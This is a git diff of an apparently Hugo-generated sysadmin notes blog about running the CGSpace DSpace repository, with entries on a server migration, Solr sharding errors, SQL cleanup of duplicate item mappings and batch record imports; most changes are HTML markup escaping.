<pre tabindex="0"><code>$ openssl s_client -connect dspacetest.cgiar.org:443 -servername dspacetest.cgiar.org -tls1_2 -tlsextdebug -status
...
OCSP response: no response sent
$ openssl s_client -connect dspacetest.cgiar.org:443 -servername dspacetest.cgiar.org -tls1_2 -tlsextdebug -status
@ -704,21 +704,21 @@ OCSP Response Data:
<li>Migrate CGSpace to new server, roughly following these steps:</li>
<li>On old server:</li>
</ul>
<pre><code># service tomcat7 stop
<pre tabindex="0"><code># service tomcat7 stop
# /home/backup/scripts/postgres_backup.sh
</code></pre><ul>
<li>On new server:</li>
</ul>
<pre><code># systemctl stop tomcat7
<pre tabindex="0"><code># systemctl stop tomcat7
# rsync -4 -av --delete 178.79.187.182:/home/cgspace.cgiar.org/assetstore/ /home/cgspace.cgiar.org/assetstore/
# rsync -4 -av --delete 178.79.187.182:/home/backup/ /home/backup/
# rsync -4 -av --delete 178.79.187.182:/home/cgspace.cgiar.org/solr/ /home/cgspace.cgiar.org/solr
# su - postgres
$ dropdb cgspace
$ createdb -O cgspace --encoding=UNICODE cgspace
$ psql cgspace -c 'alter user cgspace createuser;'
$ psql cgspace -c &#39;alter user cgspace createuser;&#39;
$ pg_restore -O -U cgspace -d cgspace -W -h localhost /home/backup/postgres/cgspace_2016-12-18.backup
$ psql cgspace -c 'alter user cgspace nocreateuser;'
$ psql cgspace -c &#39;alter user cgspace nocreateuser;&#39;
$ psql -U cgspace -f ~tomcat7/src/git/DSpace/dspace/etc/postgres/update-sequences.sql cgspace -h localhost
$ vacuumdb cgspace
$ psql cgspace
@ -750,7 +750,7 @@ $ exit
<li>Abenet wanted a CSV of the IITA community, but the web export doesn&rsquo;t include the <code>dc.date.accessioned</code> field</li>
<li>I had to export it from the command line using the <code>-a</code> flag:</li>
</ul>
<pre><code>$ [dspace]/bin/dspace metadata-export -a -f /tmp/iita.csv -i 10568/68616
<pre tabindex="0"><code>$ [dspace]/bin/dspace metadata-export -a -f /tmp/iita.csv -i 10568/68616
</code></pre><h2 id="2016-12-28">2016-12-28</h2>
<ul>
<li>We&rsquo;ve been getting two alerts per day about CPU usage on the new server from Linode</li>
@ -784,15 +784,15 @@ $ exit
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -28,7 +28,7 @@ I checked to see if the Solr sharding task that is supposed to run on January 1s
I tested on DSpace Test as well and it doesn&rsquo;t work there either
I asked on the dspace-tech mailing list because it seems to be broken, and actually now I&rsquo;m not sure if we&rsquo;ve ever had the sharding task run successfully over all these years
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -58,12 +58,12 @@ I asked on the dspace-tech mailing list because it seems to be broken, and actua
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -110,7 +110,7 @@ I asked on the dspace-tech mailing list because it seems to be broken, and actua
<time datetime="2017-01-02T10:43:00+03:00">Mon Jan 02, 2017</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -124,7 +124,7 @@ I asked on the dspace-tech mailing list because it seems to be broken, and actua
<ul>
<li>I tried to shard my local dev instance and it fails the same way:</li>
</ul>
<pre><code>$ JAVA_OPTS=&quot;-Xms768m -Xmx768m -Dfile.encoding=UTF-8&quot; ~/dspace/bin/dspace stats-util -s
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xms768m -Xmx768m -Dfile.encoding=UTF-8&#34; ~/dspace/bin/dspace stats-util -s
Moving: 9318 into core statistics-2016
Exception: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2016
org.apache.solr.client.solrj.SolrServerException: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2016
@ -171,7 +171,7 @@ Caused by: java.net.SocketException: Broken pipe (Write failed)
</code></pre><ul>
<li>And the DSpace log shows:</li>
</ul>
<pre><code>2017-01-04 22:39:05,412 INFO org.dspace.statistics.SolrLogger @ Created core with name: statistics-2016
<pre tabindex="0"><code>2017-01-04 22:39:05,412 INFO org.dspace.statistics.SolrLogger @ Created core with name: statistics-2016
2017-01-04 22:39:05,412 INFO org.dspace.statistics.SolrLogger @ Moving: 9318 records into core statistics-2016
2017-01-04 22:39:07,310 INFO org.apache.http.impl.client.SystemDefaultHttpClient @ I/O exception (java.net.SocketException) caught when processing request to {}-&gt;http://localhost:8081: Broken pipe (Write failed)
2017-01-04 22:39:07,310 INFO org.apache.http.impl.client.SystemDefaultHttpClient @ Retrying request to {}-&gt;http://localhost:8081
@ -179,15 +179,15 @@ Caused by: java.net.SocketException: Broken pipe (Write failed)
<li>Despite failing instantly, a <code>statistics-2016</code> directory was created, but it only has a data dir (no conf)</li>
<li>The Tomcat access logs show more:</li>
</ul>
<pre><code>127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &quot;GET /solr/statistics/select?q=type%3A2+AND+id%3A1&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 107
127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &quot;GET /solr/statistics/select?q=*%3A*&amp;rows=0&amp;facet=true&amp;facet.range=time&amp;facet.range.start=NOW%2FYEAR-17YEARS&amp;facet.range.end=NOW%2FYEAR%2B0YEARS&amp;facet.range.gap=%2B1YEAR&amp;facet.mincount=1&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 423
127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &quot;GET /solr/admin/cores?action=STATUS&amp;core=statistics-2016&amp;indexInfo=true&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 77
127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &quot;GET /solr/admin/cores?action=CREATE&amp;name=statistics-2016&amp;instanceDir=statistics&amp;dataDir=%2FUsers%2Faorth%2Fdspace%2Fsolr%2Fstatistics-2016%2Fdata&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 63
127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] &quot;GET /solr/statistics/select?csv.mv.separator=%7C&amp;q=*%3A*&amp;fq=time%3A%28%5B2016%5C-01%5C-01T00%5C%3A00%5C%3A00Z+TO+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%5D+NOT+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%29&amp;rows=10000&amp;wt=csv HTTP/1.1&quot; 200 4359517
127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] &quot;GET /solr/statistics/admin/luke?show=schema&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 16248
127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] &quot;POST /solr//statistics-2016/update/csv?commit=true&amp;softCommit=false&amp;waitSearcher=true&amp;f.previousWorkflowStep.split=true&amp;f.previousWorkflowStep.separator=%7C&amp;f.previousWorkflowStep.encapsulator=%22&amp;f.actingGroupId.split=true&amp;f.actingGroupId.separator=%7C&amp;f.actingGroupId.encapsulator=%22&amp;f.containerCommunity.split=true&amp;f.containerCommunity.separator=%7C&amp;f.containerCommunity.encapsulator=%22&amp;f.range.split=true&amp;f.range.separator=%7C&amp;f.range.encapsulator=%22&amp;f.containerItem.split=true&amp;f.containerItem.separator=%7C&amp;f.containerItem.encapsulator=%22&amp;f.p_communities_map.split=true&amp;f.p_communities_map.separator=%7C&amp;f.p_communities_map.encapsulator=%22&amp;f.ngram_query_search.split=true&amp;f.ngram_query_search.separator=%7C&amp;f.ngram_query_search.encapsulator=%22&amp;f.containerBitstream.split=true&amp;f.containerBitstream.separator=%7C&amp;f.containerBitstream.encapsulator=%22&amp;f.owningItem.split=true&amp;f.owningItem.separator=%7C&amp;f.owningItem.encapsulator=%22&amp;f.actingGroupParentId.split=true&amp;f.actingGroupParentId.separator=%7C&amp;f.actingGroupParentId.encapsulator=%22&amp;f.text.split=true&amp;f.text.separator=%7C&amp;f.text.encapsulator=%22&amp;f.simple_query_search.split=true&amp;f.simple_query_search.separator=%7C&amp;f.simple_query_search.encapsulator=%22&amp;f.owningComm.split=true&amp;f.owningComm.separator=%7C&amp;f.owningComm.encapsulator=%22&amp;f.owner.split=true&amp;f.owner.separator=%7C&amp;f.owner.encapsulator=%22&amp;f.filterquery.split=true&amp;f.filterquery.separator=%7C&amp;f.filterquery.encapsulator=%22&amp;f.p_group_map.split=true&amp;f.p_group_map.separator=%7C&amp;f.p_group_map.encapsulator=%22&amp;f.actorMemberGroupId.split=true&amp;f.actorMemberGroupId.separator=%7C&amp;f.actorMemberGroupId.encapsulator=%22&amp;f.bitstreamId.split=true&amp;f.bitstreamId.separator=%7C&amp;f.bitstreamId.encapsulator=%22&amp;f.group_name.split=true&amp;f.group_name.separator=%7C&amp;f.group_name.encapsulator=%22&amp;f.p_communities_name.split=true&amp;f.p_communities_name.separator=%7C&amp;f.p_communities_name.encapsulator=%22&amp;f.query.split=true&amp;f.query.separator=%7C&amp;f.query.encapsulator=%22&amp;f.workflowStep.split=true&amp;f.workflowStep.separator=%7C&amp;f.workflowStep.encapsulator=%22&amp;f.containerCollection.split=true&amp;f.containerCollection.separator=%7C&amp;f.containerCollection.encapsulator=%22&amp;f.complete_query_search.split=true&amp;f.complete_query_search.separator=%7C&amp;f.complete_query_search.encapsulator=%22&amp;f.p_communities_id.split=true&amp;f.p_communities_id.separator=%7C&amp;f.p_communities_id.encapsulator=%22&amp;f.rangeDescription.split=true&amp;f.rangeDescription.separator=%7C&amp;f.rangeDescription.encapsulator=%22&amp;f.group_id.split=true&amp;f.group_id.separator=%7C&amp;f.group_id.encapsulator=%22&amp;f.bundleName.split=true&amp;f.bundleName.separator=%7C&amp;f.bundleName.encapsulator=%22&amp;f.ngram_simplequery_search.split=true&amp;f.ngram_simplequery_search.separator=%7C&amp;f.ngram_simplequery_search.encapsulator=%22&amp;f.group_map.split=true&amp;f.group_map.separator=%7C&amp;f.group_map.encapsulator=%22&amp;f.owningColl.split=true&amp;f.owningColl.separator=%7C&amp;f.owningColl.encapsulator=%22&amp;f.p_group_id.split=true&amp;f.p_group_id.separator=%7C&amp;f.p_group_id.encapsulator=%22&amp;f.p_group_name.split=true&amp;f.p_group_name.separator=%7C&amp;f.p_group_name.encapsulator=%22&amp;wt=javabi
n&amp;version=2 HTTP/1.1&quot; 409 156
127.0.0.1 - - [04/Jan/2017:22:44:00 +0200] &quot;POST /solr/datatables/update?wt=javabin&amp;version=2 HTTP/1.1&quot; 200 41
127.0.0.1 - - [04/Jan/2017:22:44:00 +0200] &quot;POST /solr/datatables/update HTTP/1.1&quot; 200 40
<pre tabindex="0"><code>127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &#34;GET /solr/statistics/select?q=type%3A2+AND+id%3A1&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 107
127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &#34;GET /solr/statistics/select?q=*%3A*&amp;rows=0&amp;facet=true&amp;facet.range=time&amp;facet.range.start=NOW%2FYEAR-17YEARS&amp;facet.range.end=NOW%2FYEAR%2B0YEARS&amp;facet.range.gap=%2B1YEAR&amp;facet.mincount=1&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 423
127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &#34;GET /solr/admin/cores?action=STATUS&amp;core=statistics-2016&amp;indexInfo=true&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 77
127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &#34;GET /solr/admin/cores?action=CREATE&amp;name=statistics-2016&amp;instanceDir=statistics&amp;dataDir=%2FUsers%2Faorth%2Fdspace%2Fsolr%2Fstatistics-2016%2Fdata&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 63
127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] &#34;GET /solr/statistics/select?csv.mv.separator=%7C&amp;q=*%3A*&amp;fq=time%3A%28%5B2016%5C-01%5C-01T00%5C%3A00%5C%3A00Z+TO+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%5D+NOT+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%29&amp;rows=10000&amp;wt=csv HTTP/1.1&#34; 200 4359517
127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] &#34;GET /solr/statistics/admin/luke?show=schema&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 16248
127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] &#34;POST /solr//statistics-2016/update/csv?commit=true&amp;softCommit=false&amp;waitSearcher=true&amp;f.previousWorkflowStep.split=true&amp;f.previousWorkflowStep.separator=%7C&amp;f.previousWorkflowStep.encapsulator=%22&amp;f.actingGroupId.split=true&amp;f.actingGroupId.separator=%7C&amp;f.actingGroupId.encapsulator=%22&amp;f.containerCommunity.split=true&amp;f.containerCommunity.separator=%7C&amp;f.containerCommunity.encapsulator=%22&amp;f.range.split=true&amp;f.range.separator=%7C&amp;f.range.encapsulator=%22&amp;f.containerItem.split=true&amp;f.containerItem.separator=%7C&amp;f.containerItem.encapsulator=%22&amp;f.p_communities_map.split=true&amp;f.p_communities_map.separator=%7C&amp;f.p_communities_map.encapsulator=%22&amp;f.ngram_query_search.split=true&amp;f.ngram_query_search.separator=%7C&amp;f.ngram_query_search.encapsulator=%22&amp;f.containerBitstream.split=true&amp;f.containerBitstream.separator=%7C&amp;f.containerBitstream.encapsulator=%22&amp;f.owningItem.split=true&amp;f.owningItem.separator=%7C&amp;f.owningItem.encapsulator=%22&amp;f.actingGroupParentId.split=true&amp;f.actingGroupParentId.separator=%7C&amp;f.actingGroupParentId.encapsulator=%22&amp;f.text.split=true&amp;f.text.separator=%7C&amp;f.text.encapsulator=%22&amp;f.simple_query_search.split=true&amp;f.simple_query_search.separator=%7C&amp;f.simple_query_search.encapsulator=%22&amp;f.owningComm.split=true&amp;f.owningComm.separator=%7C&amp;f.owningComm.encapsulator=%22&amp;f.owner.split=true&amp;f.owner.separator=%7C&amp;f.owner.encapsulator=%22&amp;f.filterquery.split=true&amp;f.filterquery.separator=%7C&amp;f.filterquery.encapsulator=%22&amp;f.p_group_map.split=true&amp;f.p_group_map.separator=%7C&amp;f.p_group_map.encapsulator=%22&amp;f.actorMemberGroupId.split=true&amp;f.actorMemberGroupId.separator=%7C&amp;f.actorMemberGroupId.encapsulator=%22&amp;f.bitstreamId.split=true&amp;f.bitstreamId.separator=%7C&amp;f.bitstreamId.encapsulator=%22&amp;f.group_name.split=true&amp;f.group_name.separator=%7C&amp;f.group_name.encapsulator=%22&amp;f.p_communities_name.split=true&amp;f.p_communities_name.separator=%7C&amp;f.p_communities_name.encapsulator=%22&amp;f.query.split=true&amp;f.query.separator=%7C&amp;f.query.encapsulator=%22&amp;f.workflowStep.split=true&amp;f.workflowStep.separator=%7C&amp;f.workflowStep.encapsulator=%22&amp;f.containerCollection.split=true&amp;f.containerCollection.separator=%7C&amp;f.containerCollection.encapsulator=%22&amp;f.complete_query_search.split=true&amp;f.complete_query_search.separator=%7C&amp;f.complete_query_search.encapsulator=%22&amp;f.p_communities_id.split=true&amp;f.p_communities_id.separator=%7C&amp;f.p_communities_id.encapsulator=%22&amp;f.rangeDescription.split=true&amp;f.rangeDescription.separator=%7C&amp;f.rangeDescription.encapsulator=%22&amp;f.group_id.split=true&amp;f.group_id.separator=%7C&amp;f.group_id.encapsulator=%22&amp;f.bundleName.split=true&amp;f.bundleName.separator=%7C&amp;f.bundleName.encapsulator=%22&amp;f.ngram_simplequery_search.split=true&amp;f.ngram_simplequery_search.separator=%7C&amp;f.ngram_simplequery_search.encapsulator=%22&amp;f.group_map.split=true&amp;f.group_map.separator=%7C&amp;f.group_map.encapsulator=%22&amp;f.owningColl.split=true&amp;f.owningColl.separator=%7C&amp;f.owningColl.encapsulator=%22&amp;f.p_group_id.split=true&amp;f.p_group_id.separator=%7C&amp;f.p_group_id.encapsulator=%22&amp;f.p_group_name.split=true&amp;f.p_group_name.separator=%7C&amp;f.p_group_name.encapsulator=%22&amp;wt=javabin
&amp;version=2 HTTP/1.1&#34; 409 156
127.0.0.1 - - [04/Jan/2017:22:44:00 +0200] &#34;POST /solr/datatables/update?wt=javabin&amp;version=2 HTTP/1.1&#34; 200 41
127.0.0.1 - - [04/Jan/2017:22:44:00 +0200] &#34;POST /solr/datatables/update HTTP/1.1&#34; 200 40
</code></pre><ul>
<li>Very interesting&hellip; it creates the core and then fails somehow</li>
</ul>
@ -208,11 +208,11 @@ Caused by: java.net.SocketException: Broken pipe (Write failed)
<li>I found an old post on the mailing list discussing a similar issue, and listing some SQL commands that might help</li>
<li>For example, this shows 186 mappings for the item, the first three of which are real:</li>
</ul>
<pre><code>dspace=# select * from collection2item where item_id = '80596';
<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = &#39;80596&#39;;
</code></pre><ul>
<li>Then I deleted the others:</li>
</ul>
<pre><code>dspace=# delete from collection2item where item_id = '80596' and id not in (90792, 90806, 90807);
<pre tabindex="0"><code>dspace=# delete from collection2item where item_id = &#39;80596&#39; and id not in (90792, 90806, 90807);
</code></pre><ul>
<li>And in the item view it now shows the correct mappings</li>
<li>I will have to ask the DSpace people if this is a valid approach</li>
@ -223,24 +223,24 @@ Caused by: java.net.SocketException: Broken pipe (Write failed)
<li>Maria found another item with duplicate mappings: <a href="https://cgspace.cgiar.org/handle/10568/78658">https://cgspace.cgiar.org/handle/10568/78658</a></li>
<li>Error in <code>fix-metadata-values.py</code> when it tries to print the value for Entwicklung &amp; Ländlicher Raum:</li>
</ul>
<pre><code>Traceback (most recent call last):
File &quot;./fix-metadata-values.py&quot;, line 80, in &lt;module&gt;
print(&quot;Fixing {} occurences of: {}&quot;.format(records_to_fix, record[0]))
UnicodeEncodeError: 'ascii' codec can't encode character u'\xe4' in position 15: ordinal not in range(128)
<pre tabindex="0"><code>Traceback (most recent call last):
File &#34;./fix-metadata-values.py&#34;, line 80, in &lt;module&gt;
print(&#34;Fixing {} occurences of: {}&#34;.format(records_to_fix, record[0]))
UnicodeEncodeError: &#39;ascii&#39; codec can&#39;t encode character u&#39;\xe4&#39; in position 15: ordinal not in range(128)
</code></pre><ul>
<li>Seems we need to encode as UTF-8 before printing to screen, ie:</li>
</ul>
<pre><code>print(&quot;Fixing {} occurences of: {}&quot;.format(records_to_fix, record[0].encode('utf-8')))
<pre tabindex="0"><code>print(&#34;Fixing {} occurences of: {}&#34;.format(records_to_fix, record[0].encode(&#39;utf-8&#39;)))
</code></pre><ul>
<li>See: <a href="http://stackoverflow.com/a/36427358/487333">http://stackoverflow.com/a/36427358/487333</a></li>
<li>I&rsquo;m actually not sure if we need to encode() the strings to UTF-8 before writing them to the database&hellip; I&rsquo;ve never had this issue before</li>
<li>Now back to cleaning up some journal titles so we can make the controlled vocabulary:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/fix-27-journal-titles.csv -f dc.source -t correct -m 55 -d dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/fix-27-journal-titles.csv -f dc.source -t correct -m 55 -d dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Now get the top 500 journal titles:</li>
</ul>
<pre><code>dspace-# \copy (select distinct text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=55 group by text_value order by count desc limit 500) to /tmp/journal-titles.csv with csv;
<pre tabindex="0"><code>dspace-# \copy (select distinct text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=55 group by text_value order by count desc limit 500) to /tmp/journal-titles.csv with csv;
</code></pre><ul>
<li>The values are a bit dirty and outdated, since the file I had given to Abenet and Peter was from November</li>
<li>I will have to go through these and fix some more before making the controlled vocabulary</li>
@ -254,10 +254,10 @@ UnicodeEncodeError: 'ascii' codec can't encode character u'\xe4' in position 15:
<ul>
<li>Fix the two items Maria found with duplicate mappings with this script:</li>
</ul>
<pre><code>/* 184 in correct mappings: https://cgspace.cgiar.org/handle/10568/78596 */
delete from collection2item where item_id = '80596' and id not in (90792, 90806, 90807);
<pre tabindex="0"><code>/* 184 in correct mappings: https://cgspace.cgiar.org/handle/10568/78596 */
delete from collection2item where item_id = &#39;80596&#39; and id not in (90792, 90806, 90807);
/* 1 incorrect mapping: https://cgspace.cgiar.org/handle/10568/78658 */
delete from collection2item where id = '91082';
delete from collection2item where id = &#39;91082&#39;;
</code></pre><h2 id="2017-01-17">2017-01-17</h2>
<ul>
<li>Helping clean up some file names in the 232 CIAT records that Sisay worked on last week</li>
@ -266,20 +266,20 @@ delete from collection2item where id = '91082';
<li>And the file names don&rsquo;t really matter either, as long as the SAF Builder tool can read them—after that DSpace renames them with a hash in the assetstore</li>
<li>Seems like the only ones I should replace are the <code>'</code> apostrophe characters, as <code>%27</code>:</li>
</ul>
<pre><code>value.replace(&quot;'&quot;,'%27')
<pre tabindex="0"><code>value.replace(&#34;&#39;&#34;,&#39;%27&#39;)
</code></pre><ul>
<li>Add the item&rsquo;s Type to the filename column as a hint to SAF Builder so it can set a more useful description field:</li>
</ul>
<pre><code>value + &quot;__description:&quot; + cells[&quot;dc.type&quot;].value
<pre tabindex="0"><code>value + &#34;__description:&#34; + cells[&#34;dc.type&#34;].value
</code></pre><ul>
<li>Test importing of the new CIAT records (actually there are 232, not 234):</li>
</ul>
<pre><code>$ JAVA_OPTS=&quot;-Xmx512m -Dfile.encoding=UTF-8&quot; /home/dspacetest.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/79042 --source /home/aorth/CIAT_234/SimpleArchiveFormat/ --mapfile=/tmp/ciat.map &amp;&gt; /tmp/ciat.log
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx512m -Dfile.encoding=UTF-8&#34; /home/dspacetest.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/79042 --source /home/aorth/CIAT_234/SimpleArchiveFormat/ --mapfile=/tmp/ciat.map &amp;&gt; /tmp/ciat.log
</code></pre><ul>
<li>Many of the PDFs are 20, 30, 40, 50+ MB, which makes a total of 4GB</li>
<li>These are scanned from paper and likely have no compression, so we should try to test if these compression techniques help without compromising the quality too much:</li>
</ul>
<pre><code>$ convert -compress Zip -density 150x150 input.pdf output.pdf
<pre tabindex="0"><code>$ convert -compress Zip -density 150x150 input.pdf output.pdf
$ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -dQUIET -dBATCH -sOutputFile=output.pdf input.pdf
</code></pre><ul>
<li>Somewhere on the Internet suggested using a DPI of 144</li>
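<li>A quick way to try that and compare the resulting size (a sketch; file names are placeholders):</li>
</ul>
<pre><code>$ convert -compress Zip -density 144x144 input.pdf output.pdf
$ du -h input.pdf output.pdf
</code></pre><ul>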
@ -289,7 +289,7 @@ $ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -
<li>In testing a random sample of CIAT&rsquo;s PDFs for compressibility, it looks like all of these methods generally increase the file size, so we will just import them as they are</li>
<li>Import 232 CIAT records into CGSpace:</li>
</ul>
<pre><code>$ JAVA_OPTS=&quot;-Xmx512m -Dfile.encoding=UTF-8&quot; /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/68704 --source /home/aorth/CIAT_232/SimpleArchiveFormat/ --mapfile=/tmp/ciat.map &amp;&gt; /tmp/ciat.log
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx512m -Dfile.encoding=UTF-8&#34; /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/68704 --source /home/aorth/CIAT_232/SimpleArchiveFormat/ --mapfile=/tmp/ciat.map &amp;&gt; /tmp/ciat.log
</code></pre><h2 id="2017-01-22">2017-01-22</h2>
<ul>
<li>Looking at some records that Sisay is having problems importing into DSpace Test (seems to be because of copious whitespace and carriage-return characters from Excel&rsquo;s CSV exporter)</li>
@ -300,22 +300,22 @@ $ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -
<li>I merged Atmire&rsquo;s pull request into the development branch so they can deploy it on DSpace Test</li>
<li>Move some old ILRI Program communities to a new subcommunity for former programs (10568/79164):</li>
</ul>
<pre><code>$ for community in 10568/171 10568/27868 10568/231 10568/27869 10568/150 10568/230 10568/32724 10568/172; do /home/cgspace.cgiar.org/bin/dspace community-filiator --remove --parent=10568/27866 --child=&quot;$community&quot; &amp;&amp; /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/79164 --child=&quot;$community&quot;; done
<pre tabindex="0"><code>$ for community in 10568/171 10568/27868 10568/231 10568/27869 10568/150 10568/230 10568/32724 10568/172; do /home/cgspace.cgiar.org/bin/dspace community-filiator --remove --parent=10568/27866 --child=&#34;$community&#34; &amp;&amp; /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/79164 --child=&#34;$community&#34;; done
</code></pre><ul>
<li>Move some collections with <a href="https://gist.github.com/alanorth/e60b530ed4989df0c731afbb0c640515"><code>move-collections.sh</code></a> using the following config:</li>
</ul>
<pre><code>10568/42161 10568/171 10568/79341
<pre tabindex="0"><code>10568/42161 10568/171 10568/79341
10568/41914 10568/171 10568/79340
</code></pre><h2 id="2017-01-24">2017-01-24</h2>
<ul>
<li>Run all updates on DSpace Test and reboot the server</li>
<li>Run fixes for Journal titles on CGSpace:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/fix-49-journal-titles.csv -f dc.source -t correct -m 55 -d dspace -u dspace -p 'password'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/fix-49-journal-titles.csv -f dc.source -t correct -m 55 -d dspace -u dspace -p &#39;password&#39;
</code></pre><ul>
<li>Create a new list of the top 500 journal titles from the database:</li>
</ul>
<pre><code>dspace-# \copy (select distinct text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=55 group by text_value order by count desc limit 500) to /tmp/journal-titles.csv with csv;
<pre tabindex="0"><code>dspace-# \copy (select distinct text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=55 group by text_value order by count desc limit 500) to /tmp/journal-titles.csv with csv;
</code></pre><ul>
<li>Then sort them in OpenRefine and create a controlled vocabulary by manually adding the XML markup (see the format sketch below), pull request (<a href="https://github.com/ilri/DSpace/pull/298">#298</a>)</li>
<li>This would be the last issue remaining to close the meta issue about switching to controlled vocabularies (<a href="https://github.com/ilri/DSpace/pull/69">#69</a>)</li>
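<li>For reference, a minimal sketch of the controlled vocabulary XML format (the id and label values and the journal titles here are made up):</li>
</ul>
<pre><code>&lt;node id="journals" label="Journal Titles"&gt;
  &lt;isComposedBy&gt;
    &lt;node id="j1" label="Agricultural Systems"/&gt;
    &lt;node id="j2" label="Food Policy"/&gt;
  &lt;/isComposedBy&gt;
&lt;/node&gt;
</code></pre>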
@ -369,15 +369,15 @@ $ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -50,7 +50,7 @@ DELETE 1
Create issue on GitHub to track the addition of CCAFS Phase II project tags (#301)
